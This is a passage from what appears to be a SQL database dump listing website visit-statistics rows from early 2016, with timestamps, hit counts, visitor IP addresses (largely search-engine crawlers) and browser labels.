51.26','other'),(26,1454783074,1,1,0,0,'93.158.152.44','other'),(27,1454783076,2,2,0,0,'141.8.183.1','other'),(28,1454783084,2,2,0,0,'130.193.50.7','other'),(29,1454783088,1,1,0,0,'5.255.253.80','other'),(30,1454783111,1,0,1,0,'66.249.78.37',''),(31,1454783113,1,1,0,0,'157.55.39.89','other'),(32,1454783295,1,0,1,0,'68.180.229.224',''),(33,1454783722,1,0,1,0,'66.249.66.150',''),(34,1454783739,1,1,0,0,'141.0.15.209','other'),(35,1454784254,1,1,0,0,'91.196.177.69','chrome'),(36,1454784355,1,1,0,0,'178.95.159.117','chrome'),(37,1454784562,1,1,0,0,'180.76.15.26','other'),(38,1454784609,1,1,0,0,'180.76.15.147','other'),(39,1454784720,1,1,0,0,'66.249.92.87','other'),(40,1454784782,1,1,0,0,'91.196.178.36','chrome'),(41,1454784961,1,1,0,0,'180.76.15.25','other'),(42,1454784976,2,0,2,0,'66.249.78.144',''),(43,1454785630,2,0,2,0,'68.180.229.232',''),(44,1454785731,2,2,0,0,'5.255.253.95','other'),(45,1454785733,2,2,0,0,'141.8.142.35','other'),(46,1454785735,3,3,0,0,'141.8.132.34','other'),(47,1454785737,1,1,0,0,'141.8.184.29','other'),(48,1454785739,2,2,0,0,'5.255.253.124','other'),(49,1454785741,1,1,0,0,'141.8.132.71','other'),(50,1454785749,1,1,0,0,'5.255.253.80','other'),(51,1454785751,1,1,0,0,'5.255.253.103','other'),(52,1454785755,1,1,0,0,'141.8.132.45','other'),(53,1454785759,1,1,0,0,'130.193.51.29','other'),(54,1454785763,1,1,0,0,'141.8.142.76','other'),(55,1454785809,1,1,0,0,'217.69.143.60','other'),(56,1454786154,1,0,1,0,'68.180.229.224',''),(57,1454786305,1,0,1,0,'66.249.78.37',''),(58,1454786494,1,0,1,0,'66.249.78.30',''),(59,1454786600,1,1,0,0,'217.69.143.46','other'),(60,1454786810,1,1,0,0,'82.145.209.91','other'),(61,1454786904,1,1,0,0,'157.55.39.108','other'),(62,1454787160,1,1,0,0,'217.69.143.66','other'),(63,1454787402,1,0,1,0,'68.180.229.224',''),(64,1454787799,8,8,0,0,'178.154.189.17','other'),(65,1454787800,8,8,0,0,'141.8.184.18','other'),(66,1454787837,1,1,0,0,'82.145.219.97','opera'),(67,1454787949,4,4,0,0,'5.255.253.95','other'),(68,1454787961,4,4,0,0,'5.255.253.99','other'),(69,1454787972,1,1,0,0,'37.229.197.220','firefox'),(70,1454788238,1,1,0,0,'62.210.215.100','chrome'),(71,1454788762,1,1,0,0,'141.0.12.143','chrome'),(72,1454789182,1,1,0,0,'217.69.143.49','other'),(73,1454789415,1,1,0,0,'8.29.198.25','other'),(74,1454789833,1,1,0,0,'66.249.81.205','other'),(75,1454789956,5,5,0,0,'5.255.253.99','other'),(76,1454789960,1,1,0,0,'141.8.142.35','other'),(77,1454789962,5,5,0,0,'5.255.253.95','other'),(78,1454789964,2,2,0,0,'141.8.184.18','other'),(79,1454789967,4,4,0,0,'141.8.132.10','other'),(80,1454789973,2,2,0,0,'178.154.189.17','other'),(81,1454789981,2,2,0,0,'141.8.132.45','other'),(82,1454790393,1,1,0,0,'217.69.143.64','other'),(83,1454790991,1,0,1,0,'68.180.229.232',''),(84,1454791019,1,1,0,0,'94.154.233.132','other'),(85,1454791195,1,1,0,0,'217.69.143.54','other'),(86,1454791392,1,1,0,0,'144.76.29.162','other'),(87,1454791686,5,5,0,0,'141.8.184.18','other'),(89,1454791687,7,7,0,0,'5.255.253.95','other'),(91,1454791688,5,5,0,0,'5.255.253.99','other'),(92,1454791704,4,4,0,0,'178.154.189.17','other'),(93,1454791707,2,2,0,0,'141.8.142.35','other'),(94,1454791708,3,3,0,0,'141.8.132.10','other'),(95,1454791741,1,0,1,0,'66.249.78.44',''),(96,1454791758,1,1,0,0,'89.234.157.254','chrome'),(97,1454792722,1,1,0,0,'217.69.143.63','other'),(98,1454792764,1,0,1,0,'66.249.66.154',''),(99,1454792890,1,0,1,0,'68.180.229.224',''),(100,1454793129,1,1,0,0,'157.55.39.108','other'),(101,1454793228,1,1,0,0,'141.0.14.163','other'),(102,1454793303,1,1,0,0,'217.69.143.51','other'),(103,1454793381,1,0,1,0,'68.180.229.232',''),(104,1454793540,1,0,1,0,'66.249.66.169',''),(105,1454793703,1,0,1,0,'66.249.78.44',''),(106,1454793742,2,0,2,0,'66.249.78.144',''),(107,1454793753,1,1,0,0,'157.55.39.91','other'),(108,1454794424,1,1,0,0,'157.55.39.89','other'),(109,1454794517,1,0,1,0,'66.249.66.165',''),(110,1454794745,3,3,0,0,'80.91.162.99','other'),(111,1454795108,4,4,0,0,'82.193.127.15','other'),(112,1454795194,5,5,0,0,'178.154.189.17','other'),(114,1454795195,4,4,0,0,'141.8.132.10','other'),(115,1454795196,3,3,0,0,'5.255.253.95','other'),(116,1454795197,5,5,0,0,'141.8.184.18','other'),(117,1454795204,1,1,0,0,'5.255.253.99','other'),(118,1454795390,1,1,0,0,'66.249.92.87','other'),(119,1454795542,1,1,0,0,'157.55.39.92','other'),(120,1454795581,1,0,1,0,'66.249.66.154',''),(121,1454795590,1,0,1,0,'66.249.78.144',''),(122,1454796084,3,3,0,0,'144.76.7.107','other'),(123,1454796307,1,0,1,0,'66.249.66.150',''),(124,1454796753,1,0,1,0,'66.249.66.158',''),(125,1454796833,1,0,1,0,'68.180.229.232',''),(126,1454797311,1,0,1,0,'66.249.66.154',''),(127,1454797458,1,0,1,0,'66.249.78.151',''),(128,1454797662,1,0,1,0,'66.249.78.144',''),(129,1454797760,1,0,1,0,'68.180.229.232',''),(130,1454798049,1,0,1,0,'66.249.66.150',''),(131,1454798128,3,3,0,0,'141.8.184.18','other'),(132,1454798129,2,2,0,0,'178.154.189.17','other'),(135,1454798131,2,2,0,0,'141.8.132.10','other'),(136,1454798132,4,4,0,0,'141.8.132.45','other'),(137,1454798135,3,3,0,0,'5.255.253.95','other'),(139,1454798138,1,1,0,0,'93.158.152.8','other'),(140,1454798581,2,0,2,0,'66.249.78.151',''),(141,1454798697,1,0,1,0,'66.249.78.144',''),(142,1454799020,6,6,0,0,'157.55.39.92','other'),(143,1454799031,11,11,0,0,'157.55.39.91','other'),(144,1454799041,13,13,0,0,'157.55.39.108','other'),(145,1454799104,7,7,0,0,'157.55.39.89','other'),(146,1454799381,1,0,1,0,'68.180.229.232',''),(147,1454799849,1,0,1,0,'68.180.229.224',''),(148,1454800227,1,0,1,0,'66.249.78.158',''),(149,1454800247,1,1,0,0,'8.29.198.26','other'),(150,1454800603,1,1,0,0,'66.249.81.211','other'),(151,1454800660,1,0,1,0,'66.249.78.144',''),(152,1454800782,1,1,0,0,'45.79.193.230','chrome'),(153,1454801488,1,1,0,0,'157.55.39.91','other'),(154,1454801796,2,2,0,0,'141.8.132.10','other'),(155,1454801797,1,1,0,0,'141.8.142.35','other'),(157,1454801799,2,2,0,0,'130.193.51.17','other'),(159,1454801800,2,2,0,0,'93.158.152.8','other'),(161,1454801801,1,1,0,0,'130.193.37.18','other'),(162,1454801803,1,1,0,0,'130.193.51.29','other'),(164,1454801804,1,1,0,0,'5.255.253.99','other'),(166,1454801805,1,1,0,0,'93.158.152.46','other'),(167,1454801806,1,1,0,0,'178.154.189.26','other'),(168,1454801807,1,1,0,0,'5.255.253.24','other'),(170,1454801983,1,1,0,0,'157.55.39.89','other'),(171,1454802026,1,0,1,0,'66.249.78.151',''),(172,1454802836,1,1,0,0,'217.69.143.65','other'),(173,1454803831,1,1,0,0,'217.69.143.68','other'),(174,1454803832,1,1,0,0,'217.69.143.69','other'),(175,1454803933,2,0,2,0,'66.249.78.144',''),(176,1454804900,1,0,1,0,'66.249.78.151',''),(177,1454805283,1,1,0,0,'93.158.152.8','other'),(179,1454805284,1,1,0,0,'93.158.152.44','other'),(180,1454805285,1,1,0,0,'130.193.51.29','other'),(181,1454805286,1,1,0,0,'141.8.184.29','other'),(182,1454805287,1,1,0,0,'93.158.152.53','other'),(183,1454805288,1,1,0,0,'93.158.152.5','other'),(184,1454805289,1,1,0,0,'141.8.142.76','other'),(186,1454805291,1,1,0,0,'141.8.132.45','other'),(188,1454805292,1,1,0,0,'178.154.189.26','other'),(189,1454805293,1,1,0,0,'5.255.253.24','other'),(190,1454805294,1,1,0,0,'141.8.183.1','other'),(191,1454805295,1,1,0,0,'141.8.132.52','other'),(193,1454805946,1,0,1,0,'66.249.78.144',''),(194,1454806365,1,0,1,0,'66.249.78.158',''),(195,1454806451,1,1,0,0,'66.249.92.87','other'),(196,1454806473,1,1,0,0,'180.76.15.24','other'),(197,1454806532,1,1,0,0,'180.76.15.16','other'),(198,1454807171,1,0,1,0,'66.249.78.144',''),(199,1454807267,3,3,0,0,'5.255.253.95','other'),(200,1454807268,3,3,0,0,'141.8.184.18','other'),(201,1454807269,4,4,0,0,'5.255.253.99','other'),(202,1454807270,1,1,0,0,'178.154.189.17','other'),(203,1454807273,2,2,0,0,'141.8.132.10','other'),(204,1454807948,4,0,4,0,'68.180.229.232',''),(205,1454808225,1,0,1,0,'66.249.78.151',''),(206,1454808720,1,0,1,0,'66.249.66.154',''),(207,1454809244,5,5,0,0,'5.255.253.99','other'),(208,1454809248,3,3,0,0,'178.154.189.17','other'),(209,1454809252,3,3,0,0,'141.8.184.18','other'),(210,1454809256,4,4,0,0,'141.8.132.10','other'),(211,1454809619,2,2,0,0,'5.255.253.95','other'),(212,1454809623,3,3,0,0,'141.8.132.45','other'),(213,1454809671,1,0,1,0,'66.249.78.151',''),(214,1454809891,1,0,1,0,'68.180.229.232',''),(215,1454810242,1,0,1,0,'66.249.78.144',''),(216,1454810993,4,4,0,0,'82.193.127.15','other'),(217,1454811056,1,1,0,0,'8.29.198.25','other'),(218,1454811717,6,6,0,0,'141.8.184.18','other'),(219,1454811725,6,6,0,0,'5.255.253.99','other'),(220,1454811734,4,4,0,0,'178.154.189.17','other'),(221,1454811738,3,3,0,0,'141.8.132.10','other'),(222,1454811772,3,3,0,0,'5.255.253.95','other'),(223,1454811839,1,0,1,0,'66.249.66.150',''),(224,1454812455,1,0,1,0,'68.180.229.232',''),(225,1454812555,1,0,1,0,'66.249.78.158',''),(226,1454813390,1,1,0,0,'178.154.189.17','other'),(227,1454813395,2,2,0,0,'141.8.132.52','other'),(228,1454813398,1,1,0,0,'141.8.142.50','other'),(229,1454813402,2,2,0,0,'141.8.142.76','other'),(230,1454813407,1,1,0,0,'5.255.253.95','other'),(231,1454813454,1,1,0,0,'130.193.51.29','other'),(232,1454813458,1,1,0,0,'141.8.142.35','other'),(233,1454813463,1,1,0,0,'141.8.132.71','other'),(234,1454813467,1,1,0,0,'5.255.253.80','other'),(235,1454813471,1,1,0,0,'130.193.50.7','other'),(236,1454813475,1,1,0,0,'93.158.152.14','other'),(237,1454813479,1,1,0,0,'141.8.184.29','other'),(238,1454813484,1,1,0,0,'93.158.152.46','other'),(239,1454813492,1,1,0,0,'130.193.51.17','other'),(240,1454813496,1,1,0,0,'178.154.189.26','other'),(241,1454813500,1,1,0,0,'141.8.132.10','other'),(242,1454813513,1,1,0,0,'141.8.132.34','other'),(243,1454813600,1,0,1,0,'66.249.78.158',''),(244,1454813890,1,0,1,0,'66.249.78.151',''),(245,1454814191,2,0,2,0,'66.249.66.158',''),(246,1454814810,1,0,1,0,'66.249.78.151',''),(247,1454815016,1,1,0,0,'66.249.81.205','other'),(248,1454815072,1,0,1,0,'66.249.78.30',''),(249,1454815872,2,2,0,0,'141.8.184.18','other'),(250,1454815877,5,5,0,0,'141.8.132.10','other'),(251,1454815881,2,2,0,0,'5.255.253.95','other'),(252,1454815885,4,4,0,0,'5.255.253.99','other'),(253,1454815898,2,2,0,0,'178.154.189.17','other'),(254,1454815936,1,1,0,0,'141.8.142.35','other'),(255,1454816461,1,1,0,0,'157.55.39.92','other'),(256,1454817320,1,0,1,0,'68.180.229.232',''),(257,1454817350,1,1,0,0,'66.249.92.91','other'),(258,1454817427,7,7,0,0,'141.8.184.18','other'),(259,1454817436,6,6,0,0,'178.154.189.17','other'),(260,1454817440,7,7,0,0,'5.255.253.95','other'),(261,1454817496,3,3,0,0,'5.255.253.99','other'),(262,1454818517,1,0,1,0,'66.249.78.44',''),(263,1454818621,1,0,1,0,'68.180.229.232',''),(264,1454819596,1,1,0,0,'157.55.39.91','other'),(265,1454819749,2,0,2,0,'66.249.78.144',''),(266,1454819865,2,2,0,0,'141.8.184.18','other'),(267,1454819869,1,1,0,0,'5.255.253.95','other'),(268,1454819877,1,1,0,0,'178.154.189.17','other'),(269,1454819982,1,0,1,0,'66.249.78.37',''),(270,1454820025,1,0,1,0,'66.249.78.158',''),(271,1454820437,1,0,1,0,'68.180.229.232',''),(272,1454821348,1,0,1,0,'66.249.78.144',''),(273,1454821869,1,1,0,0,'8.29.198.26','other'),(274,1454821956,1,1,0,0,'93.158.152.14','other'),(275,1454821962,1,1,0,0,'5.255.253.99','other'),(276,1454821965,1,1,0,0,'141.8.142.35','other'),(277,1454821969,1,1,0,0,'93.158.152.8','other'),(278,1454821973,1,1,0,0,'141.8.132.71','other'),(279,1454821978,1,1,0,0,'5.255.253.80','other'),(280,1454821982,1,1,0,0,'141.8.132.10','other'),(281,1454822224,1,1,0,0,'66.249.81.208','other'),(282,1454822246,1,0,1,0,'66.249.78.158',''),(283,1454822644,2,2,0,0,'141.0.15.135','other'),(284,1454822868,1,0,1,0,'66.249.78.144',''),(285,1454822954,1,0,1,0,'66.249.78.151',''),(286,1454823851,1,1,0,0,'93.158.152.46','other'),(287,1454823855,1,1,0,0,'141.8.132.52','other'),(288,1454823860,1,1,0,0,'141.8.132.34','other'),(289,1454823864,1,1,0,0,'5.255.253.95','other'),(290,1454824095,1,0,1,0,'66.249.66.158',''),(291,1454824172,2,0,2,0,'66.249.78.158',''),(292,1454824382,1,0,1,0,'68.180.229.232',''),(293,1454825248,1,1,0,0,'62.210.215.100','chrome'),(294,1454825313,1,0,1,0,'66.249.66.169',''),(295,1454825825,1,1,0,0,'66.249.81.208','other'),(296,1454825948,1,1,0,0,'141.8.184.18','other'),(297,1454825952,3,3,0,0,'5.255.253.95','other'),(298,1454826606,3,0,3,0,'68.180.229.232',''),(299,1454827617,1,0,1,0,'66.249.78.144',''),(300,1454827860,1,0,1,0,'68.180.229.232',''),(301,1454828300,1,1,0,0,'66.249.92.95','other'),(302,1454828308,1,1,0,0,'37.52.38.12','chrome'),(303,1454828726,1,0,1,0,'66.249.78.144',''),(304,1454828763,1,0,1,0,'68.180.229.232',''),(305,1454829606,4,4,0,0,'141.8.184.18','other'),(306,1454829824,1,1,0,0,'138.201.16.80','other'),(307,1454830238,1,0,1,0,'66.249.66.150',''),(308,1454830309,1,1,0,0,'176.9.57.228','other'),(309,1454830317,1,1,0,0,'176.9.57.228','firefox'),(310,1454831937,1,1,0,0,'66.249.93.94','firefox'),(311,1454832484,1,0,1,0,'66.249.78.144',''),(312,1454832683,1,1,0,0,'8.29.198.25','other'),(313,1454833001,1,1,0,0,'66.249.81.208','other'),(314,1454834211,1,1,0,0,'5.255.253.24','other'),(315,1454834215,1,1,0,0,'141.8.184.29','other'),(316,1454834219,1,1,0,0,'130.193.51.17','other'),(317,1454834223,1,1,0,0,'141.8.132.52','other'),(318,1454834227,1,1,0,0,'130.193.51.26','other'),(319,1454834231,2,2,0,0,'141.8.184.18','other'),(320,1454834463,1,0,1,0,'66.249.78.44',''),(321,1454834921,1,0,1,0,'68.180.229.232',''),(322,1454835242,1,1,0,0,'216.163.188.228','firefox'),(323,1454836693,1,1,0,0,'66.249.81.211','other'),(324,1454837237,1,0,1,0,'66.249.78.144',''),(325,1454837616,2,0,2,0,'66.249.78.158',''),(326,1454837641,1,1,0,0,'141.8.132.10','other'),(327,1454837846,1,1,0,0,'180.76.15.22','other'),(328,1454837992,1,1,0,0,'66.102.9.84','firefox'),(329,1454838111,1,1,0,0,'141.0.15.198','other'),(330,1454838273,1,0,1,0,'68.180.229.232',''),(331,1454838326,1,1,0,0,'141.8.184.18','other'),(332,1454838330,1,1,0,0,'141.8.132.45','other'),(333,1454838334,1,1,0,0,'93.158.152.46','other'),(334,1454838338,1,1,0,0,'141.8.183.1','other'),(335,1454838344,1,1,0,0,'141.8.132.71','other'),(336,1454838701,1,1,0,0,'66.249.92.95','other'),(337,1454839796,1,1,0,0,'180.76.15.33','other'),(338,1454840304,1,0,1,0,'66.249.66.150',''),(339,1454840312,1,0,1,0,'66.249.78.151',''),(340,1454840410,1,0,1,0,'66.249.78.144',''),(341,1454840597,1,0,1,0,'68.180.229.232',''),(342,1454840934,6,6,0,0,'141.8.184.18','other'),(343,1454840939,6,6,0,0,'5.255.253.95','other'),(344,1454840945,1,1,0,0,'178.154.189.17','other'),(345,1454841501,1,0,1,0,'68.180.229.232',''),(346,1454842083,1,0,1,0,'66.249.66.158',''),(347,1454842118,1,0,1,0,'66.249.66.154',''),(348,1454843137,3,3,0,0,'141.8.184.18','other'),(349,1454843139,2,2,0,0,'5.255.253.95','other'),(350,1454843495,1,1,0,0,'8.29.198.25','other'),(351,1454843813,1,1,0,0,'66.249.81.211','other'),(352,1454844128,1,0,1,0,'66.249.78.37',''),(353,1454844604,1,1,0,0,'5.255.253.30','other'),(354,1454844639,1,1,0,0,'141.8.132.27','other'),(355,1454844640,1,1,0,0,'178.154.189.17','other'),(356,1454844641,3,3,0,0,'141.8.184.29','other'),(357,1454844650,2,2,0,0,'93.158.152.5','other'),(358,1454844651,2,2,0,0,'93.158.152.75','other'),(359,1454844652,1,1,0,0,'93.158.152.64','other'),(360,1454844653,1,1,0,0,'93.158.152.47','other'),(361,1454844694,1,1,0,0,'5.255.253.82','other'),(362,1454844703,2,2,0,0,'130.193.51.66','other'),(363,1454844704,1,1,0,0,'141.8.183.22','other'),(364,1454844709,1,1,0,0,'141.8.142.76','other'),(366,1454844722,1,1,0,0,'5.255.253.86','other'),(367,1454844732,1,1,0,0,'141.8.132.101','other'),(368,1454844739,1,1,0,0,'5.255.253.121','other'),(369,1454844746,1,1,0,0,'130.193.51.17','other'),(370,1454844753,1,1,0,0,'93.158.152.53','other'),(371,1454844761,1,1,0,0,'141.8.142.12','other'),(372,1454844763,2,2,0,0,'130.193.51.88','other'),(373,1454844764,1,1,0,0,'5.255.253.95','other'),(374,1454844766,1,1,0,0,'93.158.152.14','other'),(375,1454844771,1,1,0,0,'5.255.253.24','other'),(376,1454844799,2,2,0,0,'130.193.51.29','other'),(377,1454844816,1,1,0,0,'93.158.152.8','other'),(378,1454844830,1,1,0,0,'5.255.253.99','other'),(379,1454845583,64,64,0,0,'54.174.61.5','chrome'),(380,1454845596,5,5,0,0,'54.174.54.81','chrome'),(381,1454845604,8,8,0,0,'54.174.58.229','chrome'),(382,1454845641,15,15,0,0,'54.174.58.245','chrome'),(383,1454845645,14,14,0,0,'54.174.59.68','chrome'),(384,1454845808,1,1,0,0,'5.255.253.103','other'),(385,1454846631,8,8,0,0,'5.255.253.95','other'),(386,1454846732,1,0,1,0,'66.249.78.158',''),(387,1454846907,12,12,0,0,'141.8.184.18','other'),(388,1454846910,10,10,0,0,'141.8.132.10','other'),(390,1454846913,10,10,0,0,'5.255.253.99','other'),(391,1454846915,10,10,0,0,'178.154.189.17','other'),(392,1454846922,1,1,0,0,'141.8.132.45','other'),(393,1454847414,1,1,0,0,'66.249.81.211','other'),(394,1454848066,1,0,1,0,'66.249.66.150',''),(395,1454848307,1,0,1,0,'66.249.66.165',''),(396,1454848924,1,0,1,0,'66.249.78.30',''),(397,1454849291,1,1,0,0,'66.249.92.87','other'),(398,1454849400,1,0,1,0,'68.180.229.232',''),(399,1454849560,1,0,1,0,'66.249.78.151',''),(400,1454849621,1,1,0,0,'141.8.184.18','other'),(401,1454849625,1,1,0,0,'178.154.189.17','other'),(402,1454850193,3,0,3,0,'66.249.78.144',''),(403,1454850495,19,19,0,0,'94.154.233.132','other'),(404,1454851222,1,1,0,0,'66.249.81.208','other'),(405,1454851246,11,11,0,0,'141.8.184.18','other'),(406,1454851248,10,10,0,0,'5.255.253.95','other'),(407,1454851393,1,0,1,0,'68.180.229.232',''),(408,1454851596,1,1,0,0,'178.255.215.95','other'),(409,1454852000,1,0,1,0,'66.249.78.151',''),(410,1454852020,1,0,1,0,'66.249.78.144',''),(411,1454852530,1,0,1,0,'66.249.78.30',''),(412,1454852786,42,42,0,0,'141.8.184.18','other'),(413,1454853463,4,4,0,0,'5.255.253.95','other'),(414,1454853639,1,0,1,0,'66.249.78.158',''),(415,1454853841,1,0,1,0,'66.249.78.144',''),(416,1454854145,1,1,0,0,'37.54.114.56','firefox'),(417,1454854312,1,1,0,0,'8.29.198.26','other'),(418,1454854600,1,1,0,0,'66.249.81.208','other'),(419,1454854902,1,0,1,0,'66.249.78.151',''),(420,1454855572,1,1,0,0,'178.154.189.17','other'),(421,1454855577,1,1,0,0,'5.255.253.95','other'),(422,1454855581,2,2,0,0,'5.255.253.99','other'),(423,1454855594,3,3,0,0,'141.8.184.18','other'),(424,1454856214,1,0,1,0,'66.249.78.144',''),(425,1454856704,1,1,0,0,'37.54.114.56','firefox'),(426,1454857106,1,0,1,0,'68.180.229.232',''),(427,1454857940,1,0,1,0,'66.249.78.30',''),(428,1454858084,2,0,2,0,'66.249.78.144',''),(429,1454859242,25,25,0,0,'141.8.184.18','other'),(430,1454859656,1,0,1,0,'66.249.78.158',''),(431,1454859658,3,3,0,0,'5.255.253.95','other'),(432,1454859780,1,1,0,0,'66.249.92.95','other'),(433,1454860079,1,1,0,0,'62.149.0.171','other'),(434,1454860107,1,1,0,0,'194.0.131.173','other'),(435,1454860144,1,1,0,0,'194.0.131.177','other'),(436,1454860495,1,0,1,0,'66.249.78.144',''),(437,1454861028,1,1,0,0,'194.0.131.173','other'),(438,1454861503,3,3,0,0,'141.8.184.18','other'),(439,1454861507,1,1,0,0,'5.255.253.99','other'),(440,1454861695,1,1,0,0,'194.0.131.185','other'),(441,1454861921,1,1,0,0,'194.0.131.153','other'),(442,1454861944,1,1,0,0,'194.0.131.173','other'),(443,1454861977,1,1,0,0,'66.249.81.208','other'),(444,1454862009,1,1,0,0,'176.118.51.6','firefox'),(445,1454862134,2,0,2,0,'66.249.78.144',''),(446,1454862319,1,1,0,0,'194.0.131.133','other'),(447,1454862424,1,0,1,0,'66.249.66.158',''),(448,1454862478,1,1,0,0,'194.0.131.175','other'),(449,1454862501,1,1,0,0,'194.0.131.166','other'),(450,1454862578,2,0,2,0,'66.249.78.151',''),(451,1454862585,1,1,0,0,'194.0.131.131','other'),(452,1454862855,1,1,0,0,'194.0.131.173','other'),(453,1454862989,1,0,1,0,'68.180.229.232',''),(454,1454863195,1,0,1,0,'66.249.78.144',''),(455,1454863387,1,1,0,0,'194.0.131.128','other'),(456,1454863398,1,0,1,0,'66.249.78.44',''),(457,1454863465,1,1,0,0,'194.0.131.153','other'),(458,1454863591,3,0,3,0,'66.249.78.151',''),(459,1454863726,2,2,0,0,'141.8.184.18','other'),(460,1454863734,1,1,0,0,'141.8.132.45','other'),(461,1454864246,2,0,2,0,'66.249.78.144',''),(462,1454864275,1,0,1,0,'66.249.66.150',''),(463,1454865031,1,0,1,0,'68.180.229.232',''),(464,1454865116,1,1,0,0,'8.29.198.25','other'),(465,1454865351,11,11,0,0,'157.55.39.91','other'),(466,1454865366,6,6,0,0,'157.55.39.92','other'),(467,1454865445,1,1,0,0,'66.249.81.205','other'),(468,1454866176,1,1,0,0,'141.8.184.18','other'),(469,1454866252,1,0,1,0,'66.249.69.11',''),(470,1454867050,1,1,0,0,'82.193.127.15','other'),(471,1454867120,1,0,1,0,'66.249.69.124',''),(472,1454867491,1,0,1,0,'68.180.229.232',''),(473,1454867679,1,1,0,0,'119.147.146.192','chrome'),(474,1454867702,1,1,0,0,'119.147.146.189','chrome'),(475,1454868046,1,0,1,0,'66.249.69.124',''),(476,1454868102,2,2,0,0,'5.255.253.95','other'),(477,1454868190,2,0,2,0,'66.249.69.3',''),(478,1454868446,1,1,0,0,'62.212.73.49','chrome'),(479,1454868658,1,0,1,0,'66.249.69.11',''),(480,1454869021,1,1,0,0,'66.249.81.211','other'),(481,1454869680,1,1,0,0,'141.8.184.18','other'),(482,1454869891,5,5,0,0,'69.30.255.138','other'),(483,1454869994,1,0,1,0,'66.249.69.124',''),(484,1454870002,1,1,0,0,'188.163.5.62','chrome'),(485,1454870177,2,0,2,0,'66.249.69.11',''),(486,1454870400,1,1,0,0,'66.249.91.63','other'),(487,1454870413,1,0,1,0,'66.249.69.3',''),(488,1454870517,1,0,1,0,'68.180.229.232',''),(489,1454870842,1,1,0,0,'93.74.174.58','chrome'),(490,1454871257,1,0,1,0,'66.249.69.124',''),(491,1454871783,12,12,0,0,'141.8.184.18','other'),(492,1454872001,1,1,0,0,'5.255.253.95','other'),(493,1454872018,1,1,0,0,'178.154.189.17','other'),(494,1454872481,4,0,4,0,'66.249.69.124',''),(495,1454872568,1,1,0,0,'37.54.114.56','firefox'),(496,1454872571,1,1,0,0,'94.179.95.94','firefox'),(497,1454872626,2,0,2,0,'66.249.69.3',''),(498,1454872645,1,1,0,0,'66.249.81.205','other'),(499,1454873017,1,1,0,0,'180.76.15.15','other'),(500,1454873195,1,1,0,0,'92.113.175.41','chrome'),(501,1454873813,2,2,0,0,'178.154.189.17','other'),(502,1454873826,4,4,0,0,'141.8.184.18','other'),(503,1454874027,2,0,2,0,'68.180.229.232',''),(504,1454874304,1,0,1,0,'66.249.69.3',''),(505,1454874577,2,0,2,0,'66.249.69.124',''),(506,1454875603,1,1,0,0,'37.54.114.56','firefox'),(507,1454875931,1,0,1,0,'68.180.229.232',''),(508,1454875950,1,1,0,0,'8.29.198.25','other'),(509,1454876096,1,1,0,0,'94.231.176.244','chrome'),(510,1454876098,1,1,0,0,'61.135.169.40','other'),(511,1454876599,1,1,0,0,'180.76.15.30','other'),(512,1454877841,1,1,0,0,'141.8.184.18','other'),(513,1454878128,1,0,1,0,'68.180.229.232',''),(514,1454878248,3,3,0,0,'5.255.253.95','other'),(515,1454879811,18,18,0,0,'141.8.184.18','other'),(516,1454879862,8,8,0,0,'5.255.253.95','other'),(517,1454879875,1,1,0,0,'178.154.189.17','other'),(518,1454879954,1,0,1,0,'66.249.69.3',''),(519,1454880049,1,0,1,0,'68.180.229.224',''),(520,1454880460,1,0,1,0,'66.249.69.124',''),(521,1454880490,1,1,0,0,'217.69.136.206','other'),(522,1454881420,1,1,0,0,'66.249.91.4','other'),(523,1454881587,1,0,1,0,'68.180.229.232',''),(524,1454881625,1,1,0,0,'180.76.15.20','other'),(525,1454881781,1,1,0,0,'217.69.136.204','other'),(526,1454881923,2,2,0,0,'141.8.184.18','other'),(527,1454881924,1,1,0,0,'5.255.253.95','other'),(528,1454881973,2,2,0,0,'77.93.110.140','chrome'),(529,1454883084,2,2,0,0,'62.173.163.188','other'),(530,1454883087,1,1,0,0,'62.173.163.188','firefox'),(531,1454883531,2,2,0,0,'141.8.184.18','other'),(532,1454883532,1,1,0,0,'141.8.132.10','other'),(533,1454883566,1,1,0,0,'5.255.253.95','other'),(534,1454883755,1,0,1,0,'66.249.69.11',''),(535,1454884187,1,1,0,0,'5.35.59.244','chrome'),(536,1454884479,2,0,2,0,'66.249.69.3',''),(537,1454884744,1,0,1,0,'66.249.69.11',''),(538,1454885859,1,0,1,0,'68.180.229.232',''),(539,1454886667,1,0,1,0,'66.249.69.11',''),(540,1454886789,1,1,0,0,'8.29.198.26','other'),(541,1454888157,1,1,0,0,'130.193.51.17','other'),(542,1454888210,1,0,1,0,'66.249.69.124',''),(543,1454889140,3,0,3,0,'68.180.229.232',''),(544,1454889937,1,0,1,0,'66.249.69.124',''),(545,1454890278,1,1,0,0,'141.8.184.18','other'),(546,1454891393,1,0,1,0,'66.249.69.11',''),(547,1454891422,1,0,1,0,'66.249.69.3',''),(548,1454892441,1,1,0,0,'66.249.91.63','other'),(549,1454892596,1,1,0,0,'5.255.253.95','other'),(550,1454892805,1,0,1,0,'66.249.69.3',''),(551,1454893080,2,0,2,0,'66.249.69.11',''),(552,1454894190,1,1,0,0,'180.76.15.24','other'),(553,1454894301,1,1,0,0,'141.8.184.18','other'),(554,1454894317,2,0,2,0,'68.180.229.232',''),(555,1454896708,1,1,0,0,'141.8.184.18','other'),(556,1454897121,1,0,1,0,'66.249.69.11',''),(557,1454897386,1,0,1,0,'66.249.69.124',''),(558,1454897582,6,6,0,0,'157.55.39.246','other'),(559,1454897600,7,7,0,0,'157.55.39.136','other'),(560,1454897601,1,1,0,0,'8.29.198.26','other'),(561,1454897602,13,13,0,0,'40.77.167.50','other'),(562,1454897607,11,11,0,0,'157.55.39.91','other'),(563,1454898938,1,1,0,0,'130.193.50.7','other'),(564,1454898942,1,1,0,0,'93.158.152.14','other'),(565,1454899608,1,0,1,0,'66.249.69.124',''),(566,1454900783,2,0,2,0,'66.249.69.11',''),(567,1454901013,2,0,2,0,'66.249.69.3',''),(568,1454901056,1,1,0,0,'141.8.132.71','other'),(569,1454901061,1,1,0,0,'178.154.189.26','other'),(570,1454901180,1,1,0,0,'180.76.15.158','other'),(571,1454901862,1,0,1,0,'66.249.69.124',''),(572,1454902498,1,1,0,0,'5.255.253.95','other'),(573,1454902577,1,0,1,0,'66.249.69.3',''),(574,1454903360,1,1,0,0,'66.249.91.8','other'),(575,1454904077,1,0,1,0,'68.180.229.232',''),(576,1454904629,1,1,0,0,'178.154.189.17','other'),(577,1454906242,1,1,0,0,'5.255.253.95','other'),(578,1454906911,1,1,0,0,'141.0.14.65','other'),(579,1454908414,1,1,0,0,'8.29.198.26','other'),(580,1454908489,1,1,0,0,'141.8.184.18','other'),(581,1454908537,1,1,0,0,'62.210.215.100','chrome'),(582,1454909317,1,0,1,0,'6